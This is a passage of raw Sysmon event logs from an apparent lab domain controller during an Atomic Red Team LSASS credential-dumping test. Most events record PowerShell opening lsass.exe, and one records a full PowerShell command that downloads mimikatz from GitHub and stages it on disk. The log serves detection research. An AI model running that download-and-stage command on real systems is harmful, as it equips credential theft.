21:09:55.167{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.167{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.120{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.120{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000024923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:55.089{4DB9351A-A323-60D3-3106-00000000CF01}6136\PSHost.132689561950141128.6136.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.073{4DB9351A-A323-60D3-3106-00000000CF01}6136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vi1cg4ja.yyw.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.073{4DB9351A-A323-60D3-3106-00000000CF01}6136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0ide3vnm.1gf.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.057{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0ide3vnm.1gf.ps12021-06-23 21:09:55.057 10341000x800000000000000024919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.057{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x800000000000000024918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.170{4DB9351A-A320-60D3-2D06-00000000CF01}5160download.sysinternals.com0type: 5 az155186.vo.msecnd.net;type: 5 cs22.wpc.v0cdn.net;::ffff:152.199.4.33;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000024917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.010{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.010{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 10341000x800000000000000024913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.010{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.014{4DB9351A-A323-60D3-3106-00000000CF01}6136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 
21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:58.464{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.463{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 
'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() $realTagUrl = $response.ResponseUri.OriginalString $version = $realTagUrl.split('/')[-1] $fileName = 'mimikatz_trunk.zip' [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName Invoke-WebRequest $realDownloadUrl -OutFile \""$env:TEMP\Mimi.zip\"" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.448{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.448{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.448{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
